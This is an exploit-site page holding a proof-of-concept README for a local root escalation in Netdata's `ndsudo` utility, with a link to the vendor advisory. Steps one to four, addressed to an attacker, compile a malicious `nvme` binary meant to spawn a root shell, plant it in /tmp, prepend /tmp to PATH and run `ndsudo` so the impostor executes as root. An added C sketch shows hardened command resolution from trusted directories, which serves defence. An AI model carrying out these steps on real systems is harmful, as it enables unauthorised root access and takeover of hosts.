## https://sploitus.com/exploit?id=5077683C-F7E6-58BE-9375-B5A13A8782C5
# Privilege Escalation via `ndsudo` (Netdata Local Exploit)

This PoC exploits the vulnerable `ndsudo` utility bundled with Netdata to escalate local privileges to root. It works by placing a malicious binary that impersonates a trusted command (`nvme`) in a directory on the user's `PATH`; `ndsudo` resolves the command through that `PATH` and executes the impostor with root privileges.

---

## Prerequisites & Assumptions

- You have **local shell access** on the target system.
- You can run the following command, but it fails with a "not found" or similar error:

  ```bash
  ./ndsudo nvme-list
  ```
---

### 1. Compile the Malicious Payload

On your **attacker machine** (or the vulnerable system if it has a compiler), compile the binary (for example, from the file `poc.c` in the repository):

```bash
gcc poc.c -o nvme
```

This binary should be crafted to spawn a root shell or execute arbitrary commands with root privileges.

---

### 2. Transfer the Payload to the Target System

Move or upload the compiled `nvme` binary to a directory writable by your user, such as `/tmp`:

```bash
scp nvme user@target:/tmp/
# or use any file upload method you have
```

---

### 3. Prepare the Payload for Execution

On the **target system**, make sure the binary is executable and prepend its directory to your `PATH`:

```bash
chmod +x /tmp/nvme
export PATH=/tmp:$PATH
```

This ensures `ndsudo` will resolve and execute your malicious `nvme` instead of the legitimate one.

---

### 4. Trigger `ndsudo` to Execute Your Payload

Run the vulnerable command to trigger `ndsudo`:

```bash
./ndsudo nvme-list
```
---
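
Steps 3 and 4 succeed only because the command name is resolved through the caller's `PATH`. The sketch below is an added example, not code from this repository or from Netdata: it shows one way a privileged helper can resolve a command from a fixed directory list instead. The names `resolve_trusted` and `owned_and_locked` and the directory list in `main` are assumptions made for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Hypothetical helper: owned by the trusted uid, not group/other-writable. */
static int owned_and_locked(const struct stat *st, uid_t owner) {
    return st->st_uid == owner && (st->st_mode & (S_IWGRP | S_IWOTH)) == 0;
}

/* Hypothetical hardened lookup: searches only the NULL-terminated list `dirs`
 * and never reads the PATH environment variable. Returns 0 and fills `out`
 * with an absolute path on success, -1 otherwise. */
int resolve_trusted(const char *cmd, const char *const dirs[], uid_t owner,
                    char *out, size_t outlen) {
    struct stat dst, fst;
    if (cmd[0] == '\0' || strchr(cmd, '/') != NULL)
        return -1;                      /* bare command names only */
    for (size_t i = 0; dirs[i] != NULL; i++) {
        if (dirs[i][0] != '/')
            continue;                   /* absolute directories only */
        if (stat(dirs[i], &dst) != 0 || !S_ISDIR(dst.st_mode) ||
            !owned_and_locked(&dst, owner))
            continue;                   /* e.g. /tmp is world-writable: skipped */
        int n = snprintf(out, outlen, "%s/%s", dirs[i], cmd);
        if (n < 0 || (size_t)n >= outlen)
            continue;                   /* candidate path would be truncated */
        if (stat(out, &fst) == 0 && S_ISREG(fst.st_mode) &&
            owned_and_locked(&fst, owner) && (fst.st_mode & S_IXUSR))
            return 0;                   /* vetted absolute path is in `out` */
    }
    return -1;
}

int main(void) {
    /* Assumed trusted directories; adjust to the distribution's layout. */
    static const char *const dirs[] = { "/usr/sbin", "/usr/bin", "/sbin", "/bin", NULL };
    char path[4096];
    if (resolve_trusted("nvme", dirs, 0, path, sizeof path) == 0)
        printf("would exec: %s\n", path);
    else
        printf("nvme not found in trusted directories\n");
    return 0;
}
```

A helper built this way would pass the returned absolute path to `execv` with a fixed environment, so a `PATH` value set by the caller has no effect on which binary runs.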

## Resources

- Netdata GitHub Advisory: https://github.com/netdata/netdata/security/advisories/GHSA-pmhq-4cxq-wj93